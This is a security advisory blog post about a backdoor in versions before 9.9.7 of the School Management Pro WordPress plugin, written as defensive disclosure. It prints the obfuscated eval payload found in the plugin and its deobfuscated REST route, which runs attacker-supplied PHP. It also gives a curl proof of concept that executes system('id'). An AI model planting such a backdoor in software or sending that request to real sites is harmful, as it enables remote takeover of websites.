Backdoor found in The School Management Pro plugin for WordPress

Versions before 9.9.7 of the WordPress plugin “The School Management Pro” from Weblizar contain a backdoor allowing an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed. If you have an earlier version installed on your site, we recommend upgrading to version 9.9.7 or later immediately. This is a critical security issue.

Read on for the full details.

Details:

A part of the job here at Jetpack Scan is supporting our hosted WordPress business by checking suspicious files found on sites we host. Usually this is due to a file being flagged by one of our signatures, or that the site owner has found something suspicious and wants our opinion. As is the nature of things, sometimes these files are benign, some are false positives, and some are new malware strains or variations that need more work classifying properly.

Sometimes however, what we get is more interesting all together.

A couple of weeks ago one such incident occurred. The WordPress.com escalated support team contacted us about some obfuscated, obviously malicious code found in a plugin on several sites.

}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs='" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

After two rounds of trivial deobfuscation, this gives:

add_action( 'rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

The code itself isn’t all that interesting: it’s an obvious backdoor injected into the license-checking code of the plugin. It allows any attacker to execute arbitrary PHP code on the site with the plugin installed, as can be seen in the proof of concept below:

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

This is the kind of thing we often see in nulled plugins; this happens so often that we have a similar case already covered in a previous post. Our first assumption was that this was also the case here; the site owners had installed a plugin from a shady source. 

However, we were assured that the installed plugins were received directly from the vendor. This was also quickly confirmed by the vendor that removed the offending code after being made aware of its presence.

We have tried to get more information from the vendor about when the backdoor was injected, what versions are affected, and how the code ended up in the plugin in the first place. This effort has been unsuccessful, as the vendor says they do not know when or how the code came into their software.

We have seen versions at least from 8.9 that contained the backdoor in our hosted systems, but since we do not have any clear information about when the backdoor first appeared, we have to assume any version before 9.9.7 is affected.

Detecting and alerting about the issue is further complicated by the plugin operating under a number of different slugs, often using slugs containing the version number. In our hosted systems we have seen at least these variants:

  • school-management
  • school-management-v*
  • school-management-pro
  • school-management-pro-*
  • the-school-management

The free version from the WordPress.org plugin repository does not contain the licensing code, and is also not affected by this backdoor.

Timeline

2022-05-04: The escalated WordPress.com support team discovers the injected code and reaches out to Jetpack Scan for analyzing and verifying the finding. After confirming it’s a backdoor they notify the vendor.

2022-05-05: The vendor confirms the injected code indeed is in their distribution, and provides us with a version 9.9.7 where the backdoor is removed. We confirm it is clean.

2022-05-06: Vendor actively distributes version 9.9.7 to their customers and encourages them to update.

2022-05-10: Vendor replied to our additional questions about if they knew when the backdoor was added, but claim they do not know. They did provide a previous version, 9.9.4, which included the backdoor.

Conclusion

We recommend that any site with any version earlier than 9.9.7 of The School Management Pro installed upgrade immediately.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. Jetpack Security is one great WordPress security option to ensure your site and visitors are safe.

Credits

This research was a cooperation between the WordPress.com escalated support team with Nic Sevic, Thom Stackhouse and Joshua Goode, and Jetpack Scan with Harald Eilertsen and Fioravante Cavallari. Also thanks to Benedict Singer for feedback and corrections.

This entry was posted in Vulnerabilities and tagged , , . Bookmark the permalink.

Harald Eilertsen profile
Harald Eilertsen

Harald is a Certified Systems Security Professional (CISSP) with a wide background from software development and the security industry. He has a Master of Science in analog microelectronics from the Norwegian University of Science and Technology (NTNU), and has worked for companies such as Norman, Tandberg and Cisco before joining the Jetpack Scan team at Automattic.

Explore the benefits of Jetpack

Learn how Jetpack can help you protect, speed up, and grow your WordPress site.

Get up to 60% off your first year.

Compare plans

Have a question?

Comments are closed for this article, but we're still here to help! Visit the support forum and we'll be happy to answer any questions.

View support forum
  • Enter your email address to follow this blog and receive news and updates from Jetpack!

    Join 111,093 other followers
  • Browse by Topic

  • %d bloggers like this: